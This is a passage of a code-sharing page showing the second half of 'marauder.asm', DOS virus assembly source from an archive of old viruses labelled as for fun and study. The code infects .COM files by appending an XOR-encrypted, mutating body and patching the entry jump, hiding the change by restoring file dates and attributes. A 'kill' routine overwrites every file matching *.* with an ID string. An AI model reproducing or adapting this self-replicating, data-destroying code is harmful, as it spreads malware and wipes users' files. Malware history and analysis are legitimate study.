📄 marauder.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
💻 ASM
📖 第 1 页 / 共 2 页
字号:
上一页 12
              xor     ch,ch
              int     21h

              mov     ah,3eh                    
              int     21h                       

bad_file2:
              cmp     ax, 05h                   
              je      dumb                       
              cmp     ax, 02h                    
              je      dumb                      
              mov     ah, 4fh                    
              jmp     searchloop                
dumb:
              jmp     nofilesfound             

sick_of_it_all:

              cmp     word ptr [si + offset oldjmp], 5a4dh  
              je      bad_file                 

              call    seekeof

              cmp     ax,0010h                  
              jb      bad_file                   
              cmp     ax, toolarge             
              jae     bad_file                   


              sub     ax,03h                     
              mov     [si + newjmp + 2], ah  
              mov     [si + newjmp+ 1], al       
              mov     [si + newjmp + 3], myid    
              mov     ah, 0e9h                  
              mov     [si + newjmp], ah          

              xor     al,al                    
              mov     [si + donebefore], al     

              inc     word ptr [si + generation] 

              mov      bp, si                    
              call     enc_enc                   

tryagain:
              mov      ah,2ch                  
              int      21h                       
              cmp      dx, 0000h               
              je       tryagain                 
              mov      word ptr [si + offset enc_code], dx
                                                

              mov     cl, 8                      
              ror     dx, cl                     
              mov     word  ptr [si + offset mutantcode], dx

              cmp     dl, 30                    
              jng     encrypt_a                
              jmp     encrypt_b                  


encrypt_a:
             ;mov     bp, si                    

              lea     si,[bp + offset part1]     
              lea     di,[bp + offset part1_]   
              mov     cx, part1size             
              call    dostring                 
              lea     si,[bp + offset part2]     
              lea     di,[bp + offset done_]     

              mov     cx, part2size              
              call    dostring

              jmp     attach                    

encrypt_b:

              lea     si,[bp + offset parta]     
              lea     di,[bp + offset part1_]   
              mov     cx, part1size            
              call    dostring                   

              lea     si,[bp + offset partb]     
              lea     di,[bp + offset done_]     
              mov     cx, part2size              
              call    dostring                  

attach:
              call    enc_enc                   

              mov     si,bp
              mov     ah,40h                    
              mov     cx, bodyend - bodystart    
              add     cx, 5
              lea     dx,[si + bodystart]        
              call    infect                     
              jc      close_file               
                                                 

              call    seektof

              mov     ah,40h                     
              mov     cx, 4                      
              lea     dx,[si + offset newjmp]    
              int     21h                        

close_file:

              
              mov     ax,5701h                   
              mov     cx, word ptr [si + offset origtime]
              mov     dx, word ptr [si + offset origdate]
              mov     bx, word ptr [si + offset handle]
              int     21h

              mov     ah, 3eh                   
              int     21h

              mov     ax,4301h                  
              mov     cx, word ptr [si + offset origattr]
              lea     dx, [si + offset dta + filename]
              xor     ch,ch
              int     21h


nofilesfound:

              mov     ah, 03bh                   
              lea     dx, [si + offset drive]    
              int     21h                       

restoredta:
              mov     ah, 1ah                    
              mov     dx, 080h                  
              int     21h

              push    si                        
              pop     bp                        

              mov     ax, 2524h                  
              lea     dx, [si + oint24]         
              int     21h                       

              lea     si,[bp + offset thisjmp]   
              mov     di,100h                   

              mov     cx,04h                     
              cld                               
              rep     movsb                    

              mov     di, 0100h                  
              jmp     di                         

smash         proc    near

              call    enc_enc                    
              mov     ah, 4eh                    
              mov     cx, 07h                   
              lea     dx, [si + offset dwildcards] ;

r_loop:
              int     21h                       
              jc      restoredta                 

              call    kill                      

              mov     ah, 4fh                 
              jmp     r_loop

smash         endp

dostring      proc    near

              cld                                
              rep     movsb                     
              ret                              

dostring      endp


enc_enc       proc    near

              mov     si, bp                     
              add     si, offset part1           
              mov     di, si                   
              mov     cx, total_mutant          

loop_xor:
              lodsw                              
              xor     ax, [bp + mutantcode] ;
              stosw                              
              loop    loop_xor

              mov     si, bp
              ret

enc_enc       endp

seektof       proc    near

              mov     ax,4200h
              xor     cx,cx                    
              xor     dx,dx                  
              int     21h                       

              ret

seektof       endp


seekeof       proc    near

              mov    ax,4202h                  
              xor    dx,dx
              xor    cx,cx
              int    21h

              ret

seekeof       endp


openfile      proc    near

              mov    ax,3d02h                    
              lea    dx, [si + offset dta + filename]
              int    21h                         

              ret

openfile      endp

kill          proc   near

              call   openfile                    
              jc     return
              mov    bx, ax                       

              push   bx                           

              call   seekeof                      

              mov    bx, stringsize             
              div    bx                           
              mov    cx, ax                    
              pop    bx                          
              push   cx                           

              call   seektof                     
              pop    cx


loop_:
              push   cx                           
              mov    ah, 40h                      
              mov    cx, stringsize               
              lea    dx, [si + offset idbuffer]  
              int    21h
              jc     ender
              pop    cx
              dec    cx
              jcxz   ender
              jmp    loop_
ender:

              mov    ah, 3eh                     
              int    21h                       

return:
              ret

kill          endp


filespec      db      '*.COM',0                  
dwildcards    db      '*.*',0                  
rootdir       db      '..',0                     
generation    dw      0000                       
origdate      dw      ?                         
origtime      dw      ?                          
origattr      db      ?                          
handle        dw      ?                          
defaultdrive  db      ?                          
oldjmp        db      09h, 0cdh, 020h, 90h       
thisjmp       db      4 dup (?)                  
newjmp        db      4 dup (?)                  
mutantcode    dw      0000                       
donebefore    db      00                         
oint24        dd      00                         

bodyend:

; not encrypted

newint24:
              xor     al,al                     
              iret                               
endcode:

code          ends
              end    headstart
上一页 12
💿 文件大小 2335 K
👤 上传用户 zjwbt
📂 所属分类其他
🏷️ 相关标签

#prehistoric #studying #WARNING #viruses
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -